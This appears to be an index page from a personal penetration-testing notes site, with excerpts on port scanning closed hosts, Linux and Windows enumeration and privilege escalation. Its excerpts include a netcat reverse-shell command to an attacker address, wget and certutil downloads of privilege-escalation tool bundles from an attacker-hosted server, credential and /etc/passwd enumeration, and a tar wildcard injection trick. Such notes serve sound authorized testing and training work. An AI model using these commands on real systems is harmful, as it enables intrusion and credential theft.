akde/infosec

Click Here

  • If… then…

    Enumeration Code execution I am stuck

  • How to do very closed systems

    What to do if all ports seemed to be closed? Open Wire­shark and mon­i­tor it dur­ing a full TCP scan Scan also all UDP ports Fil­ter in Wire­shark where the tar­get con­nect­ed back to you. Port knock­ing? Can you trig­ger the serv­er via a third-party?  Or does it change a behviour time-based?

  • Linux privilege escalation scripts

    Pre­pare the own system: cd p151.general.1 ./scripts/update_privesc_scripts.sh cd scripts/privesc/linux python -m SimpleHTTPServer 80 Pre­pare the target: cd /dev/shm wget http://$attackerip/_ex.tar tar xf _ex.tar script Now, exe­cute it: Lin­Peas: ./linpeas.sh LinEnum: ./LinEnum.sh lin­ux-smart-enu­mer­a­tion: ./lse.sh ‑l1 lin­ux-exploit-sug­gester‑2: ./linux-exploit-suggester‑2.pl sudo-killer: ./SUDO_KILLERv2.0.5.sh lin­ux­privcheck­er: ./linuxprivchecker.py Final­ly: Copy type­script file to the PentestManager!

  • Linux privilege escalation

    Additional ideas Environment exploitation Interpolation exploitation Pre­req­ui­sites: Then, cre­ate a file in a direc­to­ry which is names like para­me­ters from the pro­gram. The pro­gram will inter­pret the file­names as arguments. Exam­ple: Assume there is a call like this in a script: tar czf /tmp/backup.tar.gz * The script is in /home/peter and because we are this…

  • Basic Linux system enumeration

    If your con­sole is nar­row, widen it at the beginning: stty rows 50 cols 200 Con­sid­er to direct­ly spawn anoth­er reverse shell: nc -e /bin/sh $attackerip 4444 & Basic enu­mer­a­tion about the host idgroupscat /etc/passwdcat /etc/groupcat /etc/hostscat /etc/fstabuname -a // Check for kernel exploits // ALSO search for kernel exploits with OS name! // If this…

  • Windows privilege escalation scripts

    Pre­pare the own system: cd p151.general.1/scripts/privesc/windows python -m SimpleHTTPServer 80 Pre­pare the target: set NTPSRV=$ownIp mkdir C:\Windows\System32\spool\drivers\color\wsc cd C:\Windows\System32\spool\drivers\color\wsc Down­load most scripts at once (>30 MB!): certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip 7za.exe x _ex.zip WinPeas Github winPEAS.batwinPEASx86.exewinPEASx64.exe Powerless Github certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat" Powerless.bat Powerless.bat Windows Exploit Suggester NG Github…

  • Windows file system enumeration

    dir Gen­er­al: Usu­al commands: There­fore: Remem­ber to use dir /R /as /ah -force. tree Start with cre­at­ing a list of all direc­to­ries and files. Down­load it. It’s way eas­i­er to look in a local edi­tor and it’s stored for the future as well. tree c:\ > C:\Windows\Temp\dsys\dirs.txtdir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt(Download the files)…

  • Basic Windows system enumeration

    General system enumeration Get gen­er­al infor­ma­tion about the OS: systeminfo Get the envi­ron­ment variabes: set Enu­mer­ate cached credentials: cmdkey /list If the cur­rent sys­tem is not known yet, try to deter­mine the ver­sion via one of the fol­low­ing files: Processes enumeration tasklist /Vtasklist /V | find "cmd.exe" // Search for a commandtasklist /V /fi "USERNAME eq NT…